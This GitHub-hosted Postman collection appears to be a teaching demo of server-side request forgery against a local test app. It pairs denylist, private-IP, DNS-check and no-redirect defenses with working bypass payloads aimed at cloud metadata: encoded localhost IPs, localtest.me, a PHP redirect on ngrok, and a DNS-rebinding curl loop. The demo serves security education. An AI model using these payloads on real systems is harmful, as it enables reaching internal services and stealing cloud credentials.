-
Notifications
You must be signed in to change notification settings - Fork 0
/
SSRF-Demo.postman_collection.json
149 lines (149 loc) · 6.32 KB
/
SSRF-Demo.postman_collection.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
{
"info": {
"_postman_id": "5c21162e-49f1-45d3-a9d4-599a914d0044",
"name": "SSRF-Demo",
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json",
"_exporter_id": "10499635"
},
"item": [
{
"name": "nodefense",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "{{url}}/nodefense?url=http://127.0.0.1:1338/latest/meta-data",
"host": [
"{{url}}"
],
"path": [
"nodefense"
],
"query": [
{
"key": "url",
"value": "http://127.0.0.1:1338/latest/meta-data"
}
]
}
},
"response": []
},
{
"name": "defense1",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "{{url}}/defense1?url=http://0x7f.0x0.0x0.0x1:1338/latest/meta-data",
"host": [
"{{url}}"
],
"path": [
"defense1"
],
"query": [
{
"key": "url",
"value": "http://0x7f.0x0.0x0.0x1:1338/latest/meta-data",
"description": "http://0x7f.0x0.0x0.0x1 - Hex encoding the localhost address should bypass this defense"
}
]
},
"description": "**Defense**: The simplest solution used by developer to defend against SSRF attacks is evaluating an hostname/IP address against a denylist. In this method, hostname is matched against a denylist or a simple regEx check to ensure that it does not point to an internal service.\n\n**Bypass**: The defense solution is bypassed by using different encoding schemes. (e.g., decimal-encoded version of 127.0.0.1 is 2130706433) and IPv6.\n\n| **Encoding Formats** | **localhost IP** | **Encoded IPs** |\n| --- | --- | --- |\n| Decimal encoding <br> | 127.0.0.1 | 2130706433 <br> |\n| Hex Encoding <br> | 127.0.0.1 | 0x7f.0x0.0x0.0x1 <br> |\n| Octal Encoding <br> | 127.0.0.1 | 0177.0.0.01 <br> |\n| Binary <br> | 127.0.0.1 | 10101001111111101010100111111110 <br> |\n| Mixed Encoding <br> | 127.0.0.1 | 0177.0.0.0x1 <br> |"
},
"response": []
},
{
"name": "defense2",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "{{url}}/defense2?url=http://localtest.me:1338/latest/meta-data",
"host": [
"{{url}}"
],
"path": [
"defense2"
],
"query": [
{
"key": "url",
"value": "http://localtest.me:1338/latest/meta-data",
"description": "localtest.me domain resolve to 127.0.0.1, resulting in effectivly bypassing the defense"
}
]
},
"description": "**Defense**: To avoid the limitations of blacklisting, some developers rely on libraries to disallow a URL which has a private IP address as its hostname. However, this solution is not resilient against DNS pinning \n\n \n**Bypass**:\n\n- An attacker can use a hostname that resolves to a private IP (e.g., [http://localtest.me:123/data](http://localtest.me:123/data) where localtest.me resolves to 127.0.0.1) to bypass the defense. It can be used by an attacker to bind a legit domain name to an internal IP address.\n \n\n- define A or AAAA records on your DNS server to your subdomains into victim’s intranet.\n \n\nhttp://test2.pstmn-stage.io -> http://169.254.169.254"
},
"response": []
},
{
"name": "defense3",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "{{url}}/defense3?url=https://3f08-49-43-100-64.ngrok-free.app/redirect.php",
"host": [
"{{url}}"
],
"path": [
"defense3"
],
"query": [
{
"key": "url",
"value": "https://3f08-49-43-100-64.ngrok-free.app/redirect.php"
}
]
},
"description": "**Defence**: Now, to mitigate the DNS pinning issue, developers can check if the hostname resolves to a private IP address by making a DNS query\n\n**Bypass**: This mitigation can be defeated by using HTTP Redirection Bypass Technique.\n\n**The Technique**:\n\nCraft a PHP redirect file in a manner that, upon execution, redirects the traffic to the internal server instead of the intended destination. This method ensures that when the targeted server resolves the URL, it redirects to the internal server, effectively circumventing any mitigation measures.\n\n``` php\n\theader('Location: http://127.0.0.1:1338/latest/meta-data');\n?>\n\n```\n\nUse [ngrok](https://ngrok.com/) to host this redirect.php file. The final Payload should look like this:\n\n`https://3c5c-49-43-100-139.ngrok-free.app/redirect.php`"
},
"response": []
},
{
"name": "defense4",
"event": [
{
"listen": "test",
"script": {
"exec": [
"pm.test(\"Status code is 200\", function () {",
" pm.response.to.have.status(200);",
"});"
],
"type": "text/javascript"
}
}
],
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "{{url}}/defense4?url=http://make-66.96.146.129-rebind-127.0.0.1-rr.1u.ms:1338/latest/meta-data",
"host": [
"{{url}}"
],
"path": [
"defense4"
],
"query": [
{
"key": "url",
"value": "http://make-66.96.146.129-rebind-127.0.0.1-rr.1u.ms:1338/latest/meta-data"
},
{
"key": "url",
"value": "http://make-127.0.0.1-rebind-66.96.146.129-rr.1u.ms:1338/latest/meta-data",
"disabled": true
}
]
},
"description": "Defense: To prevent HTTP redirection bypass, developers disable redirection in requests made from the application to the Internet\n\n**Bypass**: HTTP rebinding techique to bypass the defense\n\n- Two DNS requests are made before an HTTP request is made to a target URL:\n - Request 1: to check whether the host is pointing to a private IP address,\n - Request 2: resolve the hostname to start a connection to the target server.\n- Attackers take advantage of this by providing a URL pointing to their own server and have their DNS server serve two different DNS responses.\n - First Response: a public IP address to pass the first check,\n - Second Response: A private IP address to achieve a request forgery to an internal service.\n\nYou can leverage: [http://1u.ms](http://1u.ms) to generate the Low TTL DNS that resolves to 2 different IP addresses when quried at 2 different times.\n\n``` bash\nfor ((i=1;i<=100;i++)); do curl --location '127.0.0.1:3000/defense4?url=http://make-66.96.146.129-rebind-127.0.0.1-rr.1u.ms:1338/latest/meta-data'; done\n\n\n```"
},
"response": []
}
]
}